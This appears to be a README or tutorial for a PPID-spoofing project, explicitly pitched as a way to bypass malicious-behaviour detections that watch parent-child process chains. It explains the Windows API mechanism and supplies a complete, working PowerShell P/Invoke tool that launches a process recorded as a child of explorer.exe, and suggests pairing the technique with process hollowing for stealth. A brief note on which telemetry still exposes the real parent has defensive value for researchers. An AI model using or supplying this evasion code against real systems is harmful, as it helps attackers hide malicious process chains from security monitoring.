This is a simple method to bypass malicious-behaviour detections that rely on the parent-child process relationship. Normally, when an application starts another executable, the new process records the PID of the process that created it as its parent. Detection rules use that relationship to flag, and possibly block, suspicious chains such as Word or Excel starting PowerShell. With parent PID (PPID) spoofing the child is created so that it records a different, benign-looking parent instead of the real creator. The technique may be combined with, for example, process hollowing to achieve more stealth.

One caveat: the spoofed parent is what the process object reports, so it is what Task Manager, WMI, Sysmon Event ID 1 and Security event 4688 show. The real creating process is still visible in telemetry that records the caller separately, for example the event header of the Microsoft-Windows-Kernel-Process ETW provider or the CreatingThreadId field handed to kernel process-creation callbacks, so the technique only hides the chain from tools that trust the recorded parent PID.
The useful part is that the CreateProcess API lets you pass extended startup information: a STARTUPINFOEX carrying an attribute list built with InitializeProcThreadAttributeList and UpdateProcThreadAttribute, enabled by the EXTENDED_STARTUPINFO_PRESENT creation flag. One of the supported attributes is PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, which takes a handle to the process that should be recorded as the parent; the handle needs PROCESS_CREATE_PROCESS access, and the new process also inherits its token and inheritable handles from that process rather than from the caller. Let's see how to use it: we will create a Notepad process in a way that makes it look like it was spawned by explorer.exe.
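The procedure above, implemented from PowerShell through P/Invoke, as an added example that is not the project's CGo code. It assumes a 64-bit Windows session in which explorer.exe is running for the current user; the helper class PpidSpoof and the function Start-ProcessWithSpoofedParent are names chosen for this example.

```powershell
using namespace System.Runtime.InteropServices

# Added example, not the project's code: PPID spoofing via CreateProcess + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.
# Assumes 64-bit Windows PowerShell 5.1 or PowerShell 7 and a running explorer.exe.
if (-not ('PpidSpoof' -as [type])) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class PpidSpoof {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved; public string lpDesktop; public string lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize;
        public int dwXCountChars; public int dwYCountChars; public int dwFillAttribute;
        public int dwFlags; public short wShowWindow; public short cbReserved2;
        public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }

    public const uint PROCESS_CREATE_PROCESS       = 0x0080;     // the only right the fake-parent handle needs
    public const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; // tells CreateProcess that lpStartupInfo is STARTUPINFOEX
    public const int  PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
'@
}

function Start-ProcessWithSpoofedParent {
    param([Parameter(Mandatory)][int]$ParentPid, [Parameter(Mandatory)][string]$CommandLine)

    # Handle to the process that should appear as the parent (PROCESS_CREATE_PROCESS is sufficient).
    $hParent = [PpidSpoof]::OpenProcess([PpidSpoof]::PROCESS_CREATE_PROCESS, $false, $ParentPid)
    if ($hParent -eq [IntPtr]::Zero) { throw "OpenProcess($ParentPid) failed, error $([Marshal]::GetLastWin32Error())" }

    # First call only reports the required buffer size (it fails with ERROR_INSUFFICIENT_BUFFER by design).
    $size = [IntPtr]::Zero
    [void][PpidSpoof]::InitializeProcThreadAttributeList([IntPtr]::Zero, 1, 0, [ref]$size)
    $attrList = [Marshal]::AllocHGlobal($size)
    if (-not [PpidSpoof]::InitializeProcThreadAttributeList($attrList, 1, 0, [ref]$size)) { throw "InitializeProcThreadAttributeList failed" }

    # lpValue must point at a HANDLE-sized buffer containing the parent handle, not be the handle itself.
    $hParentPtr = [Marshal]::AllocHGlobal([IntPtr]::Size)
    [Marshal]::WriteIntPtr($hParentPtr, $hParent)
    $attr = [IntPtr][PpidSpoof]::PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
    if (-not [PpidSpoof]::UpdateProcThreadAttribute($attrList, 0, $attr, $hParentPtr, [IntPtr][IntPtr]::Size, [IntPtr]::Zero, [IntPtr]::Zero)) {
        throw "UpdateProcThreadAttribute failed, error $([Marshal]::GetLastWin32Error())"
    }

    # STARTUPINFOEX: cb must be the size of the *extended* structure. PowerShell hands back a copy when you
    # touch a nested struct field, so fill STARTUPINFO in its own variable and assign it whole.
    $si = New-Object PpidSpoof+STARTUPINFOEX
    $inner = New-Object PpidSpoof+STARTUPINFO
    $inner.cb = [Marshal]::SizeOf($si)
    $si.StartupInfo = $inner
    $si.lpAttributeList = $attrList
    $pi = New-Object PpidSpoof+PROCESS_INFORMATION

    $ok = [PpidSpoof]::CreateProcess($null, $CommandLine, [IntPtr]::Zero, [IntPtr]::Zero, $false,
        [PpidSpoof]::EXTENDED_STARTUPINFO_PRESENT, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = [Marshal]::GetLastWin32Error()

    [void][PpidSpoof]::DeleteProcThreadAttributeList($attrList)
    [Marshal]::FreeHGlobal($attrList); [Marshal]::FreeHGlobal($hParentPtr)
    [void][PpidSpoof]::CloseHandle($hParent)
    if (-not $ok) { throw "CreateProcess failed, error $err" }
    [void][PpidSpoof]::CloseHandle($pi.hProcess); [void][PpidSpoof]::CloseHandle($pi.hThread)
    return $pi.dwProcessId
}

# Spawn notepad.exe so that it records explorer.exe as its parent, then check what WMI reports.
$explorerPid = (Get-Process explorer | Select-Object -First 1).Id
$childPid = Start-ProcessWithSpoofedParent -ParentPid $explorerPid -CommandLine 'notepad.exe'
$reported = (Get-CimInstance Win32_Process -Filter "ProcessId = $childPid").ParentProcessId
"notepad PID $childPid; reported parent $reported (explorer.exe is $explorerPid, this shell is $PID)"
```

The last line should show the reported parent equal to the explorer.exe PID rather than to `$PID`, the PowerShell process that actually called CreateProcess; Win32_Process.ParentProcessId, like Task Manager and Sysmon Event ID 1, reads the recorded parent and so reflects the spoofed value. Because the child inherits its token from the named parent, pick a parent running in the same session and at the same integrity level as the caller, otherwise CreateProcess fails or the child runs with a different identity than expected.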
EvilBytecode/PPID-Spoofing
Parent Process ID Spoofing, coded in CGo.